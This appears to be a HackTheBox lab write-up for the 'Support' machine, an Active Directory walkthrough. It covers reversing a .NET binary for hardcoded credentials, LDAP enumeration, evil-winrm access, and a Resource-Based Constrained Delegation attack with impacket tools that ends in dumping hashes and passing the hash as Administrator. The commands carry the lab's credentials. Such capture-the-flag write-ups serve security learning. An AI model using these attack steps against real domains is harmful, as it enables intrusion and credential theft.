Support — HackTheBox

5 min readDec 17, 2022


Support is an easy rated AD machine from HackTheBox. It involves enumerating SMB share and reversing .Net binary to find hardcoded credentials. Then, enumerating LDAP to find password for another user and getting foothold. Finally, having the GenericAll access on DC, performing Resource Based Constrained Delegation (RBCD) to impersonate as Administrator.


53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-16 12:48:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
57147/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-16T12:49:23
|_ start_date: N/A

Port 445/139 (SMB)

Checking for null authentication on SMB, we can list shares

We can access support-tools share. It contains some windows binaries. Download everything in our machine.

UserInfo looks interesting. Unzipping it, we get some DLLs. It is Dotnet binary.

Reversing UserInfo.exe

Opening the binary using dnSpy, we can find a username ldap hardcoded in the function. Password is returned from getPassword method from protected class.

Looking at the getpassword method, it’s doing some sort of decryption on encrypted password.

On reversing this function and executing it, we get the password for ldap user.

LDAP Enumeration

Having credentials, we can dump user details from LDAP using ldapsearch. Looking at the user information, we can see an extra attribute with the support user which kinda looks like a password.

ldapsearch -x -H ldap:// -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb"

Trying the found credentials, we successfully get a hit on winrm.

crackmapexec winrm -u support -p 'Ironside47pleasure40Watchful' -d support.htb

Using evil-winrm, we get remote powershell session as support user.

evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i

Privilege Escalation

Using bloodhound python, we perform domain enumeration.

bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -ns -d support.htb -c all
zip data *.json

Opening the collected data in bloodhound and looking at the support user, it has GenericAll access on the DC.

Kerberos Resource-based Constrained Delegation

Article mention in the reference provides full details of this privilege and it’s abuse info. Following guide mentions the steps to exploit this privilege using impacket scripts.

First, create a new computer object in the domain.

impacket-addcomputer -computer-name 'UWU$' -computer-pass ev1lP@sS -dc-ip support.htb/support:Ironside47pleasure40Watchful

Add the related security descriptor of the newly created computer object to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.

# Download
wget && chmod +x ./
# Assign Privilge and Security discriptor
./ -f UWU -t DC -dc-ip support.htb\\support:Ironside47pleasure40Watchful

Then, request the impersonated service ticket on behalf of Administrator for DC

impacket-getST -spn cifs/ -impersonate Administrator -dc-ip support/UWU$:ev1lP@sS

Lastly, assign the variable KRB5CCNAME to the path of saved service ticket and using the psexec with kerberos authentication, we get

export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass -dc-ip

Now, using the secretsdump from impacket, we can dump hashes of users from machine.

Now using evil-winrm, we can get powershell remote session as Administrator user by passing the hash.